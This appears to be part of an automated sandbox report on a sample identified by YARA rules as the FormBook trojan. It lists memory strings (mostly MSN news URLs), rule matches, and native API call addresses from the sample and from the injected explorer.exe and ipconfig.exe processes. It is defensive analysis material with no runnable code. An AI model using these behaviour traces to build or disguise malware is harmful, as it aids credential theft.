Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-whines-to-cameras-in-ny-fraud-case-before-fleeing-to-f
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/england-considers-raising-smoking-age-until-cigarettes-are-bann
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/nobel-prize-in-literature-to-be-announced-in-stockholm/ar-AA1hI
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/ukraine-live-briefing-biden-expresses-worry-about-congressional
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.stacker.com/arizona/phoenix
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de
Source: explorer.exe, 00000006.00000000.1357795150.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3084273973.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3082242000.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.3836891524.0000000007065000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.yelp.com

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.hj3YCvtlg7.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.hj3YCvtlg7.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3819331140.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3821325493.0000000000780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.3820465500.0000000000750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: hj3YCvtlg7.exe PID: 7652, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: hj3YCvtlg7.exe PID: 7832, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: ipconfig.exe PID: 7884, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A360 NtCreateFile,	5_2_0041A360
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A410 NtReadFile,	5_2_0041A410
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A490 NtClose,	5_2_0041A490
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A540 NtAllocateVirtualMemory,	5_2_0041A540
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A35C NtCreateFile,	5_2_0041A35C
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A40B NtReadFile,	5_2_0041A40B
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041A53A NtAllocateVirtualMemory,	5_2_0041A53A
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762B60 NtClose,LdrInitializeThunk,	5_2_01762B60
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762BF0 NtAllocateVirtualMemory,LdrInitializeThunk,	5_2_01762BF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762AD0 NtReadFile,LdrInitializeThunk,	5_2_01762AD0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762D30 NtUnmapViewOfSection,LdrInitializeThunk,	5_2_01762D30
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762D10 NtMapViewOfSection,LdrInitializeThunk,	5_2_01762D10
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762DF0 NtQuerySystemInformation,LdrInitializeThunk,	5_2_01762DF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762DD0 NtDelayExecution,LdrInitializeThunk,	5_2_01762DD0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762C70 NtFreeVirtualMemory,LdrInitializeThunk,	5_2_01762C70
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762CA0 NtQueryInformationToken,LdrInitializeThunk,	5_2_01762CA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762F30 NtCreateSection,LdrInitializeThunk,	5_2_01762F30
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762FE0 NtCreateFile,LdrInitializeThunk,	5_2_01762FE0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762FB0 NtResumeThread,LdrInitializeThunk,	5_2_01762FB0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762F90 NtProtectVirtualMemory,LdrInitializeThunk,	5_2_01762F90
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	5_2_01762EA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762E80 NtReadVirtualMemory,LdrInitializeThunk,	5_2_01762E80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01764340 NtSetContextThread,	5_2_01764340
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01764650 NtSuspendThread,	5_2_01764650
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762BE0 NtQueryValueKey,	5_2_01762BE0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762BA0 NtEnumerateValueKey,	5_2_01762BA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762B80 NtQueryInformationFile,	5_2_01762B80
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762AF0 NtWriteFile,	5_2_01762AF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762AB0 NtWaitForSingleObject,	5_2_01762AB0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762D00 NtSetInformationFile,	5_2_01762D00
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762DB0 NtEnumerateKey,	5_2_01762DB0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762C60 NtCreateKey,	5_2_01762C60
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762C00 NtQueryInformationProcess,	5_2_01762C00
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762CF0 NtOpenProcess,	5_2_01762CF0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762CC0 NtQueryVirtualMemory,	5_2_01762CC0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762F60 NtCreateProcessEx,	5_2_01762F60
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762FA0 NtQuerySection,	5_2_01762FA0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762E30 NtWriteVirtualMemory,	5_2_01762E30
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01762EE0 NtQueueApcThread,	5_2_01762EE0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01763010 NtOpenDirectoryObject,	5_2_01763010
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01763090 NtSetValueKey,	5_2_01763090
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017635C0 NtCreateMutant,	5_2_017635C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017639B0 NtGetContextThread,	5_2_017639B0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01763D70 NtOpenThread,	5_2_01763D70
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01763D10 NtOpenProcessToken,	5_2_01763D10
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA7E12 NtProtectVirtualMemory,	6_2_0FDA7E12
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA6232 NtCreateFile,	6_2_0FDA6232
Source: C:\Windows\explorer.exe	Code function: 6_2_0FDA7E0A NtProtectVirtualMemory,	6_2_0FDA7E0A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2AD0 NtReadFile,LdrInitializeThunk,	7_2_02CF2AD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2B60 NtClose,LdrInitializeThunk,	7_2_02CF2B60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_02CF2EA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2FE0 NtCreateFile,LdrInitializeThunk,	7_2_02CF2FE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2F30 NtCreateSection,LdrInitializeThunk,	7_2_02CF2F30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2CA0 NtQueryInformationToken,LdrInitializeThunk,	7_2_02CF2CA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2C60 NtCreateKey,LdrInitializeThunk,	7_2_02CF2C60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2C70 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_02CF2C70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2DD0 NtDelayExecution,LdrInitializeThunk,	7_2_02CF2DD0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2DF0 NtQuerySystemInformation,LdrInitializeThunk,	7_2_02CF2DF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2D10 NtMapViewOfSection,LdrInitializeThunk,	7_2_02CF2D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF35C0 NtCreateMutant,LdrInitializeThunk,	7_2_02CF35C0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF4340 NtSetContextThread,	7_2_02CF4340
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF4650 NtSuspendThread,	7_2_02CF4650
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2AF0 NtWriteFile,	7_2_02CF2AF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2AB0 NtWaitForSingleObject,	7_2_02CF2AB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2BE0 NtQueryValueKey,	7_2_02CF2BE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2BF0 NtAllocateVirtualMemory,	7_2_02CF2BF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2B80 NtQueryInformationFile,	7_2_02CF2B80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2BA0 NtEnumerateValueKey,	7_2_02CF2BA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2EE0 NtQueueApcThread,	7_2_02CF2EE0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2E80 NtReadVirtualMemory,	7_2_02CF2E80
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2E30 NtWriteVirtualMemory,	7_2_02CF2E30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2F90 NtProtectVirtualMemory,	7_2_02CF2F90
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2FA0 NtQuerySection,	7_2_02CF2FA0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2FB0 NtResumeThread,	7_2_02CF2FB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2F60 NtCreateProcessEx,	7_2_02CF2F60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2CC0 NtQueryVirtualMemory,	7_2_02CF2CC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2CF0 NtOpenProcess,	7_2_02CF2CF0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2C00 NtQueryInformationProcess,	7_2_02CF2C00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2DB0 NtEnumerateKey,	7_2_02CF2DB0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2D00 NtSetInformationFile,	7_2_02CF2D00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF2D30 NtUnmapViewOfSection,	7_2_02CF2D30
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF3090 NtSetValueKey,	7_2_02CF3090
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF3010 NtOpenDirectoryObject,	7_2_02CF3010
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF39B0 NtGetContextThread,	7_2_02CF39B0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF3D70 NtOpenThread,	7_2_02CF3D70
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_02CF3D10 NtOpenProcessToken,	7_2_02CF3D10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EA360 NtCreateFile,	7_2_001EA360
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EA410 NtReadFile,	7_2_001EA410
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EA490 NtClose,	7_2_001EA490
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EA35C NtCreateFile,	7_2_001EA35C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 7_2_001EA40B NtReadFile,	7_2_001EA40B

Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 0_2_07341180	0_2_07341180
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 0_2_010CD364	0_2_010CD364
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00401026	5_2_00401026
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00401030	5_2_00401030
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041E1E5	5_2_0041E1E5
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041E266	5_2_0041E266
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00401208	5_2_00401208
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041DAE6	5_2_0041DAE6
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041DB92	5_2_0041DB92
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041DD87	5_2_0041DD87
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00402D90	5_2_00402D90
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041D5A3	5_2_0041D5A3
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041E5B4	5_2_0041E5B4
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00409E60	5_2_00409E60
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0041DEB9	5_2_0041DEB9
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_00402FB0	5_2_00402FB0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B8158	5_2_017B8158
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017CA118	5_2_017CA118
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01720100	5_2_01720100
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E81CC	5_2_017E81CC
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017F01AA	5_2_017F01AA
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017C2000	5_2_017C2000
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017EA352	5_2_017EA352
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_0173E3F0	5_2_0173E3F0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017F03E6	5_2_017F03E6
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D0274	5_2_017D0274
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017B02C0	5_2_017B02C0
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730535	5_2_01730535
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017F0591	5_2_017F0591
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017E2446	5_2_017E2446
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017D4420	5_2_017D4420
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_017DE4F6	5_2_017DE4F6
Source: C:\Users\user\Desktop\hj3YCvtlg7.exe	Code function: 5_2_01730770	5_2_01730770
